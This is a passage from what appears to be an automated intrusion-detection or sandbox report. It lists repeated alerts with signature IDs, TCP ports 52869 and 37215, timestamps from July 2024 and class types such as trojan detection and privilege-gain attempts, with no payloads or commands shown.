                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.521998
                      SID:2027339
                      Source Port:41562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.070492
                      SID:2829579
                      Source Port:37118
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:20.068152
                      SID:2025132
                      Source Port:37824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.290015
                      SID:2027339
                      Source Port:45152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.119972
                      SID:2829579
                      Source Port:44554
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.111275
                      SID:2027339
                      Source Port:43974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.360543
                      SID:2025132
                      Source Port:54518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.813695
                      SID:2027339
                      Source Port:54032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.555689
                      SID:2025132
                      Source Port:35016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.131339
                      SID:2829579
                      Source Port:43742
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.344252
                      SID:2027339
                      Source Port:37504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.374045
                      SID:2831300
                      Source Port:55868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.634372
                      SID:2835222
                      Source Port:59056
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.318733
                      SID:2027339
                      Source Port:55298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.751507
                      SID:2831300
                      Source Port:53576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.939519
                      SID:2027339
                      Source Port:50474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.951862
                      SID:2025132
                      Source Port:60714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.775082
                      SID:2831300
                      Source Port:38104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.723019
                      SID:2025132
                      Source Port:41890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.290003
                      SID:2829579
                      Source Port:56812
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.364551
                      SID:2025132
                      Source Port:48446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.057358
                      SID:2027339
                      Source Port:54552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.509004
                      SID:2027339
                      Source Port:49594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.399678
                      SID:2831300
                      Source Port:60762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.682135
                      SID:2027339
                      Source Port:42860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.322288
                      SID:2831300
                      Source Port:41996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.638305
                      SID:2829579
                      Source Port:42912
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098080
                      SID:2835222
                      Source Port:42398
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650870
                      SID:2835222
                      Source Port:53870
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.539512
                      SID:2025132
                      Source Port:35924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.966760
                      SID:2025132
                      Source Port:56330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.814790
                      SID:2025132
                      Source Port:60236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.113054
                      SID:2829579
                      Source Port:57042
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.097857
                      SID:2835222
                      Source Port:55782
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.245523
                      SID:2027339
                      Source Port:58408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.043735
                      SID:2025132
                      Source Port:46620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.454456
                      SID:2027339
                      Source Port:49386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.061779
                      SID:2829579
                      Source Port:46432
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.683079
                      SID:2027339
                      Source Port:38692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.852550
                      SID:2831300
                      Source Port:41846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.104571
                      SID:2829579
                      Source Port:43416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.988055
                      SID:2835222
                      Source Port:58870
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.591324
                      SID:2027339
                      Source Port:43900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.307218
                      SID:2835222
                      Source Port:58444
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.796509
                      SID:2027339
                      Source Port:52586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.954501
                      SID:2829579
                      Source Port:56672
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.579360
                      SID:2025132
                      Source Port:50838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:13.152454
                      SID:2025132
                      Source Port:59356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:09.321968
                      SID:2027339
                      Source Port:51482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.007136
                      SID:2027339
                      Source Port:60990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.234150
                      SID:2027339
                      Source Port:33340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.047411
                      SID:2835222
                      Source Port:47744
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.718858
                      SID:2831300
                      Source Port:58092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.115220
                      SID:2835222
                      Source Port:51988
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.614619
                      SID:2831300
                      Source Port:37214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:01.645032
                      SID:2027339
                      Source Port:54798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.596401
                      SID:2027339
                      Source Port:39248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.261844
                      SID:2027339
                      Source Port:36412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.032492
                      SID:2835222
                      Source Port:35612
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.853279
                      SID:2027339
                      Source Port:52536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.817771
                      SID:2829579
                      Source Port:59020
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.331813
                      SID:2027339
                      Source Port:45648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.053062
                      SID:2829579
                      Source Port:60982
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.702506
                      SID:2025132
                      Source Port:49530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.654172
                      SID:2829579
                      Source Port:37200
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.359782
                      SID:2025132
                      Source Port:57764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.066373
                      SID:2829579
                      Source Port:59408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.207937
                      SID:2025132
                      Source Port:37816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.193880
                      SID:2025132
                      Source Port:34308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.036064
                      SID:2829579
                      Source Port:36302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.652877
                      SID:2831300
                      Source Port:47380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.598095
                      SID:2831300
                      Source Port:52414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.281781
                      SID:2027339
                      Source Port:39014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.711138
                      SID:2025132
                      Source Port:42232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.005974
                      SID:2027339
                      Source Port:56290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.101402
                      SID:2027339
                      Source Port:49536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650870
                      SID:2829579
                      Source Port:50818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.317774
                      SID:2831300
                      Source Port:55592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.374418
                      SID:2027339
                      Source Port:55916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.095462
                      SID:2829579
                      Source Port:39338
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.241196
                      SID:2027339
                      Source Port:39282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.614193
                      SID:2831300
                      Source Port:59036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.503352
                      SID:2027339
                      Source Port:57016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.638418
                      SID:2829579
                      Source Port:36698
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.655109
                      SID:2027339
                      Source Port:54774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.693536
                      SID:2025132
                      Source Port:33042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.578116
                      SID:2831300
                      Source Port:44384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.877765
                      SID:2027339
                      Source Port:46094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.756983
                      SID:2027339
                      Source Port:60230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.608153
                      SID:2027339
                      Source Port:40144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.005094
                      SID:2027339
                      Source Port:41146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.634372
                      SID:2835222
                      Source Port:55954
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.656173
                      SID:2027339
                      Source Port:47368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.057728
                      SID:2835222
                      Source Port:34020
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.932550
                      SID:2831300
                      Source Port:49520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.168569
                      SID:2829579
                      Source Port:56512
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.713934
                      SID:2831300
                      Source Port:47396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.053605
                      SID:2829579
                      Source Port:51996
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631549
                      SID:2835222
                      Source Port:49196
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.064358
                      SID:2829579
                      Source Port:40914
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.176787
                      SID:2025132
                      Source Port:49826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.031510
                      SID:2835222
                      Source Port:48472
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.988055
                      SID:2835222
                      Source Port:41168
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.164529
                      SID:2831300
                      Source Port:56394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.044223
                      SID:2835222
                      Source Port:53408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.538390
                      SID:2025132
                      Source Port:53262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.971718
                      SID:2025132
                      Source Port:44830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.287639
                      SID:2027339
                      Source Port:38582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.353096
                      SID:2027339
                      Source Port:37304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048367
                      SID:2829579
                      Source Port:36266
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.686153
                      SID:2831300
                      Source Port:50918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.931222
                      SID:2831300
                      Source Port:56994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.489843
                      SID:2025132
                      Source Port:58924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:08.171169
                      SID:2025132
                      Source Port:44566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.212254
                      SID:2027339
                      Source Port:48726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.691384
                      SID:2831300
                      Source Port:51458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.054776
                      SID:2027339
                      Source Port:60916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:12.193882
                      SID:2025132
                      Source Port:41006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.985200
                      SID:2027339
                      Source Port:45994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.277250
                      SID:2831300
                      Source Port:54614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.369883
                      SID:2025132
                      Source Port:40972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:59.938491
                      SID:2025132
                      Source Port:46086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.472037
                      SID:2027339
                      Source Port:58472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:10.141900
                      SID:2027339
                      Source Port:48662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.113390
                      SID:2835222
                      Source Port:34024
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:35.459810
                      SID:2027339
                      Source Port:48992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.485100
                      SID:2027339
                      Source Port:54638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.520139
                      SID:2027339
                      Source Port:36254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.280564
                      SID:2025132
                      Source Port:46594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.064977
                      SID:2027339
                      Source Port:45862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.258403
                      SID:2027339
                      Source Port:35944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.620386
                      SID:2027339
                      Source Port:50282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.926465
                      SID:2027339
                      Source Port:33854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.693650
                      SID:2027339
                      Source Port:60962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050313
                      SID:2835222
                      Source Port:50522
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.300817
                      SID:2025132
                      Source Port:52658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.975107
                      SID:2835222
                      Source Port:46984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.258596
                      SID:2831300
                      Source Port:46492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:50.085627
                      SID:2831300
                      Source Port:52618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.064240
                      SID:2829579
                      Source Port:59016
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.944299
                      SID:2835222
                      Source Port:38370
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.977603
                      SID:2835222
                      Source Port:44556
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.636583
                      SID:2027339
                      Source Port:59580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.220833
                      SID:2835222
                      Source Port:33462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.338154
                      SID:2027339
                      Source Port:60880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.820979
                      SID:2829579
                      Source Port:35366
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.337240
                      SID:2025132
                      Source Port:37948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.576249
                      SID:2025132
                      Source Port:34132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:01.201976
                      SID:2025132
                      Source Port:53466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.555687
                      SID:2027339
                      Source Port:47658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.686800
                      SID:2027339
                      Source Port:46680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.677485
                      SID:2831300
                      Source Port:32882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.103467
                      SID:2835222
                      Source Port:55324
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.131339
                      SID:2829579
                      Source Port:46360
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.877747
                      SID:2829579
                      Source Port:37222
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.749737
                      SID:2829579
                      Source Port:36574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.287237
                      SID:2831300
                      Source Port:33288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.049485
                      SID:2027339
                      Source Port:43448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.910426
                      SID:2835222
                      Source Port:54072
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.170156
                      SID:2025132
                      Source Port:40400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.655109
                      SID:2831300
                      Source Port:44428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:03.439543
                      SID:2025132
                      Source Port:44954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.651026
                      SID:2835222
                      Source Port:51658
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.817771
                      SID:2835222
                      Source Port:55094
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.618084
                      SID:2025132
                      Source Port:45878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.220899
                      SID:2829579
                      Source Port:48734
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.039129
                      SID:2829579
                      Source Port:45482
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312895
                      SID:2831300
                      Source Port:51676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.572503
                      SID:2027339
                      Source Port:45032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.991548
                      SID:2835222
                      Source Port:44798
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.572517
                      SID:2027339
                      Source Port:41196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.178062
                      SID:2835222
                      Source Port:50036
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.059767
                      SID:2835222
                      Source Port:47416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.571815
                      SID:2831300
                      Source Port:41624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.407777
                      SID:2027339
                      Source Port:51602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639012
                      SID:2829579
                      Source Port:37310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.666100
                      SID:2829579
                      Source Port:54798
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.370395
                      SID:2025132
                      Source Port:33046
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.113660
                      SID:2027339
                      Source Port:37010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.952782
                      SID:2835222
                      Source Port:55492
                      Destination Port:37215
                      Protocol:TCP
